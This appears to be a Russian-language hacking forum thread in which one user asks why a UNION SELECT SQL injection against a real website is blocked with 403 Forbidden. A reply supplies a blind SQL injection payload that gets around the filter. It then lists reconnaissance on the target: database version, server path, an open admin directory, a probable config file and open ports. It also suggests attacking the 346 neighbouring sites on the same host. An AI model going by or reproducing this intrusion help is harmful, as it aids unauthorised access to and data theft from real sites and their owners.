Сообщение от
Imperou$
Салют народ =)
Прошу помощи.
Подобрал поля через order by (скуля),при попытке вывести поля через union select выводит страницу 403 Forbidden
Поля подобрал верно стопудофф.
Ввожу
/page/about_tema.php?id=16+union+select+1,2,3,4,5,6--
и ппц.
Что это может быть и как бороться?
Там фильтры стоят на комбинации union select и прочее. Надо вот так:
Код:
http://www.site.com/pages/blog_historial.php?MUESBLOG=BLOG&VALOTEMA=107+AND+ascii(lower(substring(version(),1,1)))=53
стоит 5 версия мускула, можно при желании все вытянуть...
Код:
/home/site/public_html/
путь от корня к WWW
Можно просматривать содержимое каталога:
Код:
http://www.site.com/admin/includes/
Вот сдесь по всей видимости конфигурационные данные
Код:
http://www.site.com/admin/includes/configuracion.php
Система - линукс
Открытые порты: 21, 25, 26, 53, 80, 110, 143, 443, 465, 993, 995, 3306
Думаю самый вариант в твоем случае ломать соседние сайты, а их 346 =)
PS адресс сайта убрал по просьбе Imperou$